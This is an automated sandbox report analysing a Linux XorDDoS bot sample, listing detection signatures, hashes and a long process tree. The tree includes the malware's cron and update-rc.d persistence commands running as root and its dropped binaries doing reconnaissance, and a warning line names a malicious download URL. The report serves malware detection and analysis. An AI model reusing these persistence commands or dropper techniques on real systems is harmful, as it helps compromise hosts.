Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
libudev.so

Overview

General Information

Sample Name:	libudev.so
Analysis ID:	660268
MD5:	7dc92a289a05c45d4179a322344ad09c
SHA1:	be912477f64a1ee9f2d8ddaebce6efdfd00e7ccd
SHA256:	8642022960d919321ccfcfb0a0cd631db0e5dac3e75014fc0c4cc6ff413c72c5
Tags:	32elfxorddos
Infos:

Detection

XorDDoS

Score:	100
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Antivirus detection for dropped file

Yara detected XorDDoS Bot

Snort IDS alert for network traffic

Sample tries to persist itself using System V runlevels

Machine Learning detection for dropped file

Sample tries to persist itself using cron

Drops files in suspicious directories

Sample deletes itself

Machine Learning detection for sample

Writes ELF files to disk

Yara signature match

Drops files with innocent-looking names

PID-file does not contain an ASCII number

Writes shell script files to disk

Reads system information from the proc file system

Uses the "uname" system call to query kernel version information (possible evasion)

Executes the "systemctl" command used for controlling the systemd system and service manager

Detected non-DNS traffic on DNS port

Executes commands using a shell command-line interpreter

Sample and/or dropped files contains symbols with suspicious names

Reads CPU information from /proc indicative of miner or evasive malware

Writes shell script file to disk with an unusual file extension

Classification

×

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	660268
Start date and time: 09/07/202218:43:05	2022-07-09 18:43:05 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	libudev.so
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Detection:	MAL
Classification:	mal100.troj.evad.linSO@0/19@5/0

Warnings

VT rate limit hit for: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9yp

Runtime Messages

Command:	/tmp/libudev.so
PID:	6230
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:

Process Tree

system is lnxubuntu20

libudev.so (PID: 6230, Parent: 6124, MD5: 7dc92a289a05c45d4179a322344ad09c) Arguments: /tmp/libudev.so

libudev.so New Fork (PID: 6231, Parent: 6230)

libudev.so New Fork (PID: 6232, Parent: 6231)

libudev.so New Fork (PID: 6233, Parent: 6232)

libudev.so New Fork (PID: 6234, Parent: 6231)

libudev.so New Fork (PID: 6235, Parent: 6234)

update-rc.d (PID: 6235, Parent: 1860, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: update-rc.d libudev.so defaults

update-rc.d New Fork (PID: 6241, Parent: 6235)

systemctl (PID: 6241, Parent: 6235, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload

libudev.so New Fork (PID: 6236, Parent: 6231)

sh (PID: 6236, Parent: 6231, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"

sh New Fork (PID: 6237, Parent: 6236)

sed (PID: 6237, Parent: 6236, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -i /\\/etc\\/cron.hourly\\/gcc.sh/d /etc/crontab

libudev.so New Fork (PID: 6263, Parent: 6231)

libudev.so New Fork (PID: 6264, Parent: 6263)

mljnlxkfff (PID: 6264, Parent: 6263, MD5: d750c8beac9f7e938ed3d56311d9b66c) Arguments: /usr/bin/mljnlxkfff id 6231

mljnlxkfff New Fork (PID: 6265, Parent: 6264)

libudev.so New Fork (PID: 6266, Parent: 6231)

libudev.so New Fork (PID: 6267, Parent: 6266)

mljnlxkfff (PID: 6267, Parent: 6266, MD5: d750c8beac9f7e938ed3d56311d9b66c) Arguments: /usr/bin/mljnlxkfff "grep \"A\"" 6231

mljnlxkfff New Fork (PID: 6270, Parent: 6267)

libudev.so New Fork (PID: 6268, Parent: 6231)

libudev.so New Fork (PID: 6269, Parent: 6268)

mljnlxkfff (PID: 6269, Parent: 6268, MD5: d750c8beac9f7e938ed3d56311d9b66c) Arguments: /usr/bin/mljnlxkfff su 6231

mljnlxkfff New Fork (PID: 6274, Parent: 6269)

libudev.so New Fork (PID: 6271, Parent: 6231)

libudev.so New Fork (PID: 6272, Parent: 6271)

mljnlxkfff (PID: 6272, Parent: 6271, MD5: d750c8beac9f7e938ed3d56311d9b66c) Arguments: /usr/bin/mljnlxkfff "cat resolv.conf" 6231

mljnlxkfff New Fork (PID: 6276, Parent: 6272)

libudev.so New Fork (PID: 6273, Parent: 6231)

libudev.so New Fork (PID: 6275, Parent: 6273)

mljnlxkfff (PID: 6275, Parent: 6273, MD5: d750c8beac9f7e938ed3d56311d9b66c) Arguments: /usr/bin/mljnlxkfff ifconfig 6231

mljnlxkfff New Fork (PID: 6277, Parent: 6275)

libudev.so New Fork (PID: 6280, Parent: 6231)

libudev.so New Fork (PID: 6281, Parent: 6280)

jjfbelholv (PID: 6281, Parent: 6280, MD5: 49d50c6d28b847418207973b5aeb45e4) Arguments: /usr/bin/jjfbelholv id 6231

jjfbelholv New Fork (PID: 6282, Parent: 6281)

libudev.so New Fork (PID: 6283, Parent: 6231)

libudev.so New Fork (PID: 6284, Parent: 6283)

jjfbelholv (PID: 6284, Parent: 6283, MD5: 49d50c6d28b847418207973b5aeb45e4) Arguments: /usr/bin/jjfbelholv whoami 6231

jjfbelholv New Fork (PID: 6285, Parent: 6284)

libudev.so New Fork (PID: 6286, Parent: 6231)

libudev.so New Fork (PID: 6287, Parent: 6286)

jjfbelholv (PID: 6287, Parent: 6286, MD5: 49d50c6d28b847418207973b5aeb45e4) Arguments: /usr/bin/jjfbelholv pwd 6231

jjfbelholv New Fork (PID: 6288, Parent: 6287)

libudev.so New Fork (PID: 6289, Parent: 6231)

libudev.so New Fork (PID: 6290, Parent: 6289)

jjfbelholv (PID: 6290, Parent: 6289, MD5: 49d50c6d28b847418207973b5aeb45e4) Arguments: /usr/bin/jjfbelholv "sleep 1" 6231

jjfbelholv New Fork (PID: 6293, Parent: 6290)

libudev.so New Fork (PID: 6291, Parent: 6231)

libudev.so New Fork (PID: 6292, Parent: 6291)

jjfbelholv (PID: 6292, Parent: 6291, MD5: 49d50c6d28b847418207973b5aeb45e4) Arguments: /usr/bin/jjfbelholv "cd /etc" 6231

jjfbelholv New Fork (PID: 6294, Parent: 6292)

libudev.so New Fork (PID: 6298, Parent: 6231)

libudev.so New Fork (PID: 6299, Parent: 6298)

trcmbxxcta (PID: 6299, Parent: 6298, MD5: e93ee3f4ded35ceeab60752300a344d0) Arguments: /usr/bin/trcmbxxcta who 6231

trcmbxxcta New Fork (PID: 6300, Parent: 6299)

libudev.so New Fork (PID: 6301, Parent: 6231)

libudev.so New Fork (PID: 6302, Parent: 6301)

trcmbxxcta (PID: 6302, Parent: 6301, MD5: e93ee3f4ded35ceeab60752300a344d0) Arguments: /usr/bin/trcmbxxcta "sleep 1" 6231

trcmbxxcta New Fork (PID: 6305, Parent: 6302)

libudev.so New Fork (PID: 6303, Parent: 6231)

libudev.so New Fork (PID: 6304, Parent: 6303)

trcmbxxcta (PID: 6304, Parent: 6303, MD5: e93ee3f4ded35ceeab60752300a344d0) Arguments: /usr/bin/trcmbxxcta who 6231

trcmbxxcta New Fork (PID: 6308, Parent: 6304)

libudev.so New Fork (PID: 6306, Parent: 6231)

libudev.so New Fork (PID: 6307, Parent: 6306)

trcmbxxcta (PID: 6307, Parent: 6306, MD5: e93ee3f4ded35ceeab60752300a344d0) Arguments: /usr/bin/trcmbxxcta uptime 6231

trcmbxxcta New Fork (PID: 6311, Parent: 6307)

libudev.so New Fork (PID: 6309, Parent: 6231)

libudev.so New Fork (PID: 6310, Parent: 6309)

trcmbxxcta (PID: 6310, Parent: 6309, MD5: e93ee3f4ded35ceeab60752300a344d0) Arguments: /usr/bin/trcmbxxcta uptime 6231

trcmbxxcta New Fork (PID: 6312, Parent: 6310)

libudev.so New Fork (PID: 6315, Parent: 6231)

libudev.so New Fork (PID: 6316, Parent: 6315)

ctwojuywol (PID: 6316, Parent: 6315, MD5: 637b8bb85e23041fe2f4a3767c0e251b) Arguments: /usr/bin/ctwojuywol "netstat -antop" 6231

ctwojuywol New Fork (PID: 6317, Parent: 6316)

libudev.so New Fork (PID: 6318, Parent: 6231)

libudev.so New Fork (PID: 6319, Parent: 6318)

ctwojuywol (PID: 6319, Parent: 6318, MD5: 637b8bb85e23041fe2f4a3767c0e251b) Arguments: /usr/bin/ctwojuywol pwd 6231

ctwojuywol New Fork (PID: 6320, Parent: 6319)

libudev.so New Fork (PID: 6321, Parent: 6231)

libudev.so New Fork (PID: 6322, Parent: 6321)

ctwojuywol (PID: 6322, Parent: 6321, MD5: 637b8bb85e23041fe2f4a3767c0e251b) Arguments: /usr/bin/ctwojuywol bash 6231

ctwojuywol New Fork (PID: 6323, Parent: 6322)

libudev.so New Fork (PID: 6324, Parent: 6231)

libudev.so New Fork (PID: 6325, Parent: 6324)

ctwojuywol (PID: 6325, Parent: 6324, MD5: 637b8bb85e23041fe2f4a3767c0e251b) Arguments: /usr/bin/ctwojuywol bash 6231

ctwojuywol New Fork (PID: 6326, Parent: 6325)

libudev.so New Fork (PID: 6327, Parent: 6231)

libudev.so New Fork (PID: 6328, Parent: 6327)

ctwojuywol (PID: 6328, Parent: 6327, MD5: 637b8bb85e23041fe2f4a3767c0e251b) Arguments: /usr/bin/ctwojuywol "ifconfig eth0" 6231

ctwojuywol New Fork (PID: 6331, Parent: 6328)

libudev.so New Fork (PID: 6334, Parent: 6231)

libudev.so New Fork (PID: 6335, Parent: 6334)

fsqerkomug (PID: 6335, Parent: 6334, MD5: e446fff5f449758979147b09c39cef27) Arguments: /usr/bin/fsqerkomug ls 6231

fsqerkomug New Fork (PID: 6336, Parent: 6335)

libudev.so New Fork (PID: 6337, Parent: 6231)

libudev.so New Fork (PID: 6338, Parent: 6337)

fsqerkomug (PID: 6338, Parent: 6337, MD5: e446fff5f449758979147b09c39cef27) Arguments: /usr/bin/fsqerkomug "grep \"A\"" 6231

fsqerkomug New Fork (PID: 6341, Parent: 6338)

libudev.so New Fork (PID: 6339, Parent: 6231)

libudev.so New Fork (PID: 6340, Parent: 6339)

fsqerkomug (PID: 6340, Parent: 6339, MD5: e446fff5f449758979147b09c39cef27) Arguments: /usr/bin/fsqerkomug "netstat -an" 6231

fsqerkomug New Fork (PID: 6344, Parent: 6340)

libudev.so New Fork (PID: 6342, Parent: 6231)

libudev.so New Fork (PID: 6343, Parent: 6342)

fsqerkomug (PID: 6343, Parent: 6342, MD5: e446fff5f449758979147b09c39cef27) Arguments: /usr/bin/fsqerkomug "ifconfig eth0" 6231

fsqerkomug New Fork (PID: 6347, Parent: 6343)

libudev.so New Fork (PID: 6345, Parent: 6231)

libudev.so New Fork (PID: 6346, Parent: 6345)

fsqerkomug (PID: 6346, Parent: 6345, MD5: e446fff5f449758979147b09c39cef27) Arguments: /usr/bin/fsqerkomug whoami 6231

fsqerkomug New Fork (PID: 6348, Parent: 6346)

libudev.so New Fork (PID: 6351, Parent: 6231)

libudev.so New Fork (PID: 6352, Parent: 6351)

cjrbrkowir (PID: 6352, Parent: 6351, MD5: 671fb9e6c4188b2c387307ee031f7816) Arguments: /usr/bin/cjrbrkowir "ls -la" 6231

cjrbrkowir New Fork (PID: 6353, Parent: 6352)

libudev.so New Fork (PID: 6354, Parent: 6231)

libudev.so New Fork (PID: 6355, Parent: 6354)

cjrbrkowir (PID: 6355, Parent: 6354, MD5: 671fb9e6c4188b2c387307ee031f7816) Arguments: /usr/bin/cjrbrkowir "echo \"find\"" 6231

cjrbrkowir New Fork (PID: 6357, Parent: 6355)

libudev.so New Fork (PID: 6356, Parent: 6231)

libudev.so New Fork (PID: 6358, Parent: 6356)

cjrbrkowir (PID: 6358, Parent: 6356, MD5: 671fb9e6c4188b2c387307ee031f7816) Arguments: /usr/bin/cjrbrkowir "netstat -an" 6231

cjrbrkowir New Fork (PID: 6361, Parent: 6358)

libudev.so New Fork (PID: 6359, Parent: 6231)

libudev.so New Fork (PID: 6360, Parent: 6359)

cjrbrkowir (PID: 6360, Parent: 6359, MD5: 671fb9e6c4188b2c387307ee031f7816) Arguments: /usr/bin/cjrbrkowir "grep \"A\"" 6231

cjrbrkowir New Fork (PID: 6363, Parent: 6360)

libudev.so New Fork (PID: 6362, Parent: 6231)

libudev.so New Fork (PID: 6364, Parent: 6362)

cjrbrkowir (PID: 6364, Parent: 6362, MD5: 671fb9e6c4188b2c387307ee031f7816) Arguments: /usr/bin/cjrbrkowir "cd /etc" 6231

cjrbrkowir New Fork (PID: 6365, Parent: 6364)

libudev.so New Fork (PID: 6369, Parent: 6231)

libudev.so New Fork (PID: 6370, Parent: 6369)

ypclxoxcxk (PID: 6370, Parent: 6369, MD5: 189fa45a47a27aedf70f0e8468d9facb) Arguments: /usr/bin/ypclxoxcxk ifconfig 6231

ypclxoxcxk New Fork (PID: 6371, Parent: 6370)

libudev.so New Fork (PID: 6372, Parent: 6231)

libudev.so New Fork (PID: 6373, Parent: 6372)

ypclxoxcxk (PID: 6373, Parent: 6372, MD5: 189fa45a47a27aedf70f0e8468d9facb) Arguments: /usr/bin/ypclxoxcxk uptime 6231

ypclxoxcxk New Fork (PID: 6374, Parent: 6373)

libudev.so New Fork (PID: 6375, Parent: 6231)

libudev.so New Fork (PID: 6376, Parent: 6375)

ypclxoxcxk (PID: 6376, Parent: 6375, MD5: 189fa45a47a27aedf70f0e8468d9facb) Arguments: /usr/bin/ypclxoxcxk "ps -ef" 6231

ypclxoxcxk New Fork (PID: 6379, Parent: 6376)

libudev.so New Fork (PID: 6377, Parent: 6231)

libudev.so New Fork (PID: 6378, Parent: 6377)

ypclxoxcxk (PID: 6378, Parent: 6377, MD5: 189fa45a47a27aedf70f0e8468d9facb) Arguments: /usr/bin/ypclxoxcxk id 6231

ypclxoxcxk New Fork (PID: 6381, Parent: 6378)

libudev.so New Fork (PID: 6380, Parent: 6231)

libudev.so New Fork (PID: 6382, Parent: 6380)

ypclxoxcxk (PID: 6382, Parent: 6380, MD5: 189fa45a47a27aedf70f0e8468d9facb) Arguments: /usr/bin/ypclxoxcxk "ifconfig eth0" 6231

ypclxoxcxk New Fork (PID: 6383, Parent: 6382)

libudev.so New Fork (PID: 6388, Parent: 6231)

libudev.so New Fork (PID: 6389, Parent: 6388)

uhyqxsqece (PID: 6389, Parent: 6388, MD5: dac7a7f61f77eb41e695ad36523c8faa) Arguments: /usr/bin/uhyqxsqece uptime 6231

uhyqxsqece New Fork (PID: 6390, Parent: 6389)

libudev.so New Fork (PID: 6391, Parent: 6231)

libudev.so New Fork (PID: 6392, Parent: 6391)

uhyqxsqece (PID: 6392, Parent: 6391, MD5: dac7a7f61f77eb41e695ad36523c8faa) Arguments: /usr/bin/uhyqxsqece "ifconfig eth0" 6231

uhyqxsqece New Fork (PID: 6395, Parent: 6392)

libudev.so New Fork (PID: 6393, Parent: 6231)

libudev.so New Fork (PID: 6394, Parent: 6393)

uhyqxsqece (PID: 6394, Parent: 6393, MD5: dac7a7f61f77eb41e695ad36523c8faa) Arguments: /usr/bin/uhyqxsqece uptime 6231

uhyqxsqece New Fork (PID: 6398, Parent: 6394)

libudev.so New Fork (PID: 6396, Parent: 6231)

libudev.so New Fork (PID: 6397, Parent: 6396)

uhyqxsqece (PID: 6397, Parent: 6396, MD5: dac7a7f61f77eb41e695ad36523c8faa) Arguments: /usr/bin/uhyqxsqece "route -n" 6231

uhyqxsqece New Fork (PID: 6401, Parent: 6397)

libudev.so New Fork (PID: 6399, Parent: 6231)

libudev.so New Fork (PID: 6400, Parent: 6399)

uhyqxsqece (PID: 6400, Parent: 6399, MD5: dac7a7f61f77eb41e695ad36523c8faa) Arguments: /usr/bin/uhyqxsqece "ls -la" 6231

uhyqxsqece New Fork (PID: 6402, Parent: 6400)

libudev.so New Fork (PID: 6407, Parent: 6231)

libudev.so New Fork (PID: 6408, Parent: 6407)

tiupbsaswr (PID: 6408, Parent: 6407, MD5: f03f39e4aaf6a5ca7a154972e56405f7) Arguments: /usr/bin/tiupbsaswr "ifconfig eth0" 6231

tiupbsaswr New Fork (PID: 6409, Parent: 6408)

libudev.so New Fork (PID: 6410, Parent: 6231)

libudev.so New Fork (PID: 6411, Parent: 6410)

tiupbsaswr (PID: 6411, Parent: 6410, MD5: f03f39e4aaf6a5ca7a154972e56405f7) Arguments: /usr/bin/tiupbsaswr ifconfig 6231

tiupbsaswr New Fork (PID: 6412, Parent: 6411)

libudev.so New Fork (PID: 6413, Parent: 6231)

libudev.so New Fork (PID: 6414, Parent: 6413)

tiupbsaswr (PID: 6414, Parent: 6413, MD5: f03f39e4aaf6a5ca7a154972e56405f7) Arguments: /usr/bin/tiupbsaswr id 6231

tiupbsaswr New Fork (PID: 6417, Parent: 6414)

libudev.so New Fork (PID: 6415, Parent: 6231)

libudev.so New Fork (PID: 6416, Parent: 6415)

tiupbsaswr (PID: 6416, Parent: 6415, MD5: f03f39e4aaf6a5ca7a154972e56405f7) Arguments: /usr/bin/tiupbsaswr "ls -la" 6231

tiupbsaswr New Fork (PID: 6420, Parent: 6416)

libudev.so New Fork (PID: 6418, Parent: 6231)

libudev.so New Fork (PID: 6419, Parent: 6418)

tiupbsaswr (PID: 6419, Parent: 6418, MD5: f03f39e4aaf6a5ca7a154972e56405f7) Arguments: /usr/bin/tiupbsaswr who 6231

tiupbsaswr New Fork (PID: 6421, Parent: 6419)

libudev.so New Fork (PID: 6424, Parent: 6231)

libudev.so New Fork (PID: 6425, Parent: 6424)

uijxdyxaco (PID: 6425, Parent: 6424, MD5: 4f925977b7fa1d98ec538468e3547e28) Arguments: /usr/bin/uijxdyxaco "cd /etc" 6231

uijxdyxaco New Fork (PID: 6426, Parent: 6425)

libudev.so New Fork (PID: 6427, Parent: 6231)

libudev.so New Fork (PID: 6428, Parent: 6427)

uijxdyxaco (PID: 6428, Parent: 6427, MD5: 4f925977b7fa1d98ec538468e3547e28) Arguments: /usr/bin/uijxdyxaco ls 6231

uijxdyxaco New Fork (PID: 6429, Parent: 6428)

libudev.so New Fork (PID: 6430, Parent: 6231)

libudev.so New Fork (PID: 6431, Parent: 6430)

uijxdyxaco (PID: 6431, Parent: 6430, MD5: 4f925977b7fa1d98ec538468e3547e28) Arguments: /usr/bin/uijxdyxaco su 6231

uijxdyxaco New Fork (PID: 6434, Parent: 6431)

libudev.so New Fork (PID: 6432, Parent: 6231)

libudev.so New Fork (PID: 6433, Parent: 6432)

uijxdyxaco (PID: 6433, Parent: 6432, MD5: 4f925977b7fa1d98ec538468e3547e28) Arguments: /usr/bin/uijxdyxaco "ls -la" 6231

uijxdyxaco New Fork (PID: 6437, Parent: 6433)

libudev.so New Fork (PID: 6435, Parent: 6231)

libudev.so New Fork (PID: 6436, Parent: 6435)

uijxdyxaco (PID: 6436, Parent: 6435, MD5: 4f925977b7fa1d98ec538468e3547e28) Arguments: /usr/bin/uijxdyxaco who 6231

uijxdyxaco New Fork (PID: 6438, Parent: 6436)

libudev.so New Fork (PID: 6441, Parent: 6231)

libudev.so New Fork (PID: 6442, Parent: 6441)

bnuowhwlvc (PID: 6442, Parent: 6441, MD5: 9731334739440e32b8e810ccddd96c17) Arguments: /usr/bin/bnuowhwlvc "netstat -antop" 6231

bnuowhwlvc New Fork (PID: 6443, Parent: 6442)

libudev.so New Fork (PID: 6444, Parent: 6231)

libudev.so New Fork (PID: 6445, Parent: 6444)

bnuowhwlvc (PID: 6445, Parent: 6444, MD5: 9731334739440e32b8e810ccddd96c17) Arguments: /usr/bin/bnuowhwlvc "ls -la" 6231

bnuowhwlvc New Fork (PID: 6446, Parent: 6445)

libudev.so New Fork (PID: 6447, Parent: 6231)

libudev.so New Fork (PID: 6448, Parent: 6447)

bnuowhwlvc (PID: 6448, Parent: 6447, MD5: 9731334739440e32b8e810ccddd96c17) Arguments: /usr/bin/bnuowhwlvc "netstat -antop" 6231

bnuowhwlvc New Fork (PID: 6449, Parent: 6448)

libudev.so New Fork (PID: 6450, Parent: 6231)

libudev.so New Fork (PID: 6451, Parent: 6450)

bnuowhwlvc (PID: 6451, Parent: 6450, MD5: 9731334739440e32b8e810ccddd96c17) Arguments: /usr/bin/bnuowhwlvc "ls -la" 6231

bnuowhwlvc New Fork (PID: 6454, Parent: 6451)

libudev.so New Fork (PID: 6452, Parent: 6231)

libudev.so New Fork (PID: 6453, Parent: 6452)

bnuowhwlvc (PID: 6453, Parent: 6452, MD5: 9731334739440e32b8e810ccddd96c17) Arguments: /usr/bin/bnuowhwlvc id 6231

bnuowhwlvc New Fork (PID: 6455, Parent: 6453)

libudev.so New Fork (PID: 6459, Parent: 6231)

libudev.so New Fork (PID: 6460, Parent: 6459)

chrcfbeejh (PID: 6460, Parent: 6459, MD5: cd015ff5581523f795a9cdff85751e4e) Arguments: /usr/bin/chrcfbeejh ifconfig 6231

chrcfbeejh New Fork (PID: 6461, Parent: 6460)

libudev.so New Fork (PID: 6462, Parent: 6231)

libudev.so New Fork (PID: 6463, Parent: 6462)

chrcfbeejh (PID: 6463, Parent: 6462, MD5: cd015ff5581523f795a9cdff85751e4e) Arguments: /usr/bin/chrcfbeejh "grep \"A\"" 6231

chrcfbeejh New Fork (PID: 6465, Parent: 6463)

libudev.so New Fork (PID: 6464, Parent: 6231)

libudev.so New Fork (PID: 6466, Parent: 6464)

chrcfbeejh (PID: 6466, Parent: 6464, MD5: cd015ff5581523f795a9cdff85751e4e) Arguments: /usr/bin/chrcfbeejh "cat resolv.conf" 6231

chrcfbeejh New Fork (PID: 6467, Parent: 6466)

libudev.so New Fork (PID: 6468, Parent: 6231)

libudev.so New Fork (PID: 6469, Parent: 6468)

chrcfbeejh (PID: 6469, Parent: 6468, MD5: cd015ff5581523f795a9cdff85751e4e) Arguments: /usr/bin/chrcfbeejh gnome-terminal 6231

chrcfbeejh New Fork (PID: 6472, Parent: 6469)

libudev.so New Fork (PID: 6470, Parent: 6231)

libudev.so New Fork (PID: 6471, Parent: 6470)

chrcfbeejh (PID: 6471, Parent: 6470, MD5: cd015ff5581523f795a9cdff85751e4e) Arguments: /usr/bin/chrcfbeejh id 6231

chrcfbeejh New Fork (PID: 6473, Parent: 6471)

libudev.so New Fork (PID: 6476, Parent: 6231)

libudev.so New Fork (PID: 6477, Parent: 6476)

hfdnmorvjd (PID: 6477, Parent: 6476, MD5: 58cfbcd9b56c6de7ce40ba3c465cf465) Arguments: /usr/bin/hfdnmorvjd "cd /etc" 6231

hfdnmorvjd New Fork (PID: 6478, Parent: 6477)

libudev.so New Fork (PID: 6479, Parent: 6231)

libudev.so New Fork (PID: 6480, Parent: 6479)

hfdnmorvjd (PID: 6480, Parent: 6479, MD5: 58cfbcd9b56c6de7ce40ba3c465cf465) Arguments: /usr/bin/hfdnmorvjd "sleep 1" 6231

hfdnmorvjd New Fork (PID: 6481, Parent: 6480)

libudev.so New Fork (PID: 6482, Parent: 6231)

libudev.so New Fork (PID: 6483, Parent: 6482)

hfdnmorvjd (PID: 6483, Parent: 6482, MD5: 58cfbcd9b56c6de7ce40ba3c465cf465) Arguments: /usr/bin/hfdnmorvjd bash 6231

hfdnmorvjd New Fork (PID: 6485, Parent: 6483)

libudev.so New Fork (PID: 6484, Parent: 6231)

libudev.so New Fork (PID: 6486, Parent: 6484)

hfdnmorvjd (PID: 6486, Parent: 6484, MD5: 58cfbcd9b56c6de7ce40ba3c465cf465) Arguments: /usr/bin/hfdnmorvjd "grep \"A\"" 6231

hfdnmorvjd New Fork (PID: 6491, Parent: 6486)

libudev.so New Fork (PID: 6489, Parent: 6231)

libudev.so New Fork (PID: 6490, Parent: 6489)

hfdnmorvjd (PID: 6490, Parent: 6489, MD5: 58cfbcd9b56c6de7ce40ba3c465cf465) Arguments: /usr/bin/hfdnmorvjd whoami 6231

hfdnmorvjd New Fork (PID: 6492, Parent: 6490)

libudev.so New Fork (PID: 6495, Parent: 6231)

libudev.so New Fork (PID: 6496, Parent: 6495)

mongquumqw (PID: 6496, Parent: 6495, MD5: bd91d415d3d25aa31f7fa9f812b79548) Arguments: /usr/bin/mongquumqw bash 6231

mongquumqw New Fork (PID: 6497, Parent: 6496)

libudev.so New Fork (PID: 6498, Parent: 6231)

libudev.so New Fork (PID: 6499, Parent: 6498)

mongquumqw (PID: 6499, Parent: 6498, MD5: bd91d415d3d25aa31f7fa9f812b79548) Arguments: /usr/bin/mongquumqw who 6231

mongquumqw New Fork (PID: 6500, Parent: 6499)

libudev.so New Fork (PID: 6501, Parent: 6231)

libudev.so New Fork (PID: 6502, Parent: 6501)

mongquumqw (PID: 6502, Parent: 6501, MD5: bd91d415d3d25aa31f7fa9f812b79548) Arguments: /usr/bin/mongquumqw "netstat -antop" 6231

mongquumqw New Fork (PID: 6504, Parent: 6502)

libudev.so New Fork (PID: 6503, Parent: 6231)

libudev.so New Fork (PID: 6505, Parent: 6503)

mongquumqw (PID: 6505, Parent: 6503, MD5: bd91d415d3d25aa31f7fa9f812b79548) Arguments: /usr/bin/mongquumqw "netstat -antop" 6231

mongquumqw New Fork (PID: 6508, Parent: 6505)

libudev.so New Fork (PID: 6506, Parent: 6231)

libudev.so New Fork (PID: 6507, Parent: 6506)

mongquumqw (PID: 6507, Parent: 6506, MD5: bd91d415d3d25aa31f7fa9f812b79548) Arguments: /usr/bin/mongquumqw pwd 6231

mongquumqw New Fork (PID: 6509, Parent: 6507)

libudev.so New Fork (PID: 6512, Parent: 6231)

libudev.so New Fork (PID: 6513, Parent: 6512)

hrrmkhkkhv (PID: 6513, Parent: 6512, MD5: d3379066576970eab5be5293801f397c) Arguments: /usr/bin/hrrmkhkkhv "ifconfig eth0" 6231

hrrmkhkkhv New Fork (PID: 6514, Parent: 6513)

libudev.so New Fork (PID: 6515, Parent: 6231)

libudev.so New Fork (PID: 6516, Parent: 6515)

hrrmkhkkhv (PID: 6516, Parent: 6515, MD5: d3379066576970eab5be5293801f397c) Arguments: /usr/bin/hrrmkhkkhv "echo \"find\"" 6231

hrrmkhkkhv New Fork (PID: 6518, Parent: 6516)

libudev.so New Fork (PID: 6517, Parent: 6231)

libudev.so New Fork (PID: 6519, Parent: 6517)

hrrmkhkkhv (PID: 6519, Parent: 6517, MD5: d3379066576970eab5be5293801f397c) Arguments: /usr/bin/hrrmkhkkhv ls 6231

hrrmkhkkhv New Fork (PID: 6522, Parent: 6519)

libudev.so New Fork (PID: 6520, Parent: 6231)

libudev.so New Fork (PID: 6521, Parent: 6520)

hrrmkhkkhv (PID: 6521, Parent: 6520, MD5: d3379066576970eab5be5293801f397c) Arguments: /usr/bin/hrrmkhkkhv "route -n" 6231

hrrmkhkkhv New Fork (PID: 6525, Parent: 6521)

libudev.so New Fork (PID: 6523, Parent: 6231)

libudev.so New Fork (PID: 6524, Parent: 6523)

hrrmkhkkhv (PID: 6524, Parent: 6523, MD5: d3379066576970eab5be5293801f397c) Arguments: /usr/bin/hrrmkhkkhv su 6231

hrrmkhkkhv New Fork (PID: 6526, Parent: 6524)

libudev.so New Fork (PID: 6530, Parent: 6231)

libudev.so New Fork (PID: 6531, Parent: 6530)

cuwlelaebc (PID: 6531, Parent: 6530, MD5: cc56c8f5e3b21e31509e1f361dd133f0) Arguments: /usr/bin/cuwlelaebc "echo \"find\"" 6231

cuwlelaebc New Fork (PID: 6532, Parent: 6531)

libudev.so New Fork (PID: 6533, Parent: 6231)

libudev.so New Fork (PID: 6534, Parent: 6533)

cuwlelaebc (PID: 6534, Parent: 6533, MD5: cc56c8f5e3b21e31509e1f361dd133f0) Arguments: /usr/bin/cuwlelaebc "ps -ef" 6231

cuwlelaebc New Fork (PID: 6535, Parent: 6534)

libudev.so New Fork (PID: 6536, Parent: 6231)

libudev.so New Fork (PID: 6537, Parent: 6536)

cuwlelaebc (PID: 6537, Parent: 6536, MD5: cc56c8f5e3b21e31509e1f361dd133f0) Arguments: /usr/bin/cuwlelaebc whoami 6231

cuwlelaebc New Fork (PID: 6538, Parent: 6537)

libudev.so New Fork (PID: 6539, Parent: 6231)

libudev.so New Fork (PID: 6540, Parent: 6539)

cuwlelaebc (PID: 6540, Parent: 6539, MD5: cc56c8f5e3b21e31509e1f361dd133f0) Arguments: /usr/bin/cuwlelaebc whoami 6231

cuwlelaebc New Fork (PID: 6543, Parent: 6540)

libudev.so New Fork (PID: 6541, Parent: 6231)

libudev.so New Fork (PID: 6542, Parent: 6541)

cuwlelaebc (PID: 6542, Parent: 6541, MD5: cc56c8f5e3b21e31509e1f361dd133f0) Arguments: /usr/bin/cuwlelaebc whoami 6231

cuwlelaebc New Fork (PID: 6544, Parent: 6542)

libudev.so New Fork (PID: 6548, Parent: 6231)

libudev.so New Fork (PID: 6549, Parent: 6548)

zpxsvbblcg (PID: 6549, Parent: 6548, MD5: 70ebe03fd6dcf93b8a9c51c469cb3b54) Arguments: /usr/bin/zpxsvbblcg "grep \"A\"" 6231

zpxsvbblcg New Fork (PID: 6550, Parent: 6549)

libudev.so New Fork (PID: 6551, Parent: 6231)

libudev.so New Fork (PID: 6552, Parent: 6551)

zpxsvbblcg (PID: 6552, Parent: 6551, MD5: 70ebe03fd6dcf93b8a9c51c469cb3b54) Arguments: /usr/bin/zpxsvbblcg su 6231

zpxsvbblcg New Fork (PID: 6553, Parent: 6552)

libudev.so New Fork (PID: 6554, Parent: 6231)

libudev.so New Fork (PID: 6555, Parent: 6554)

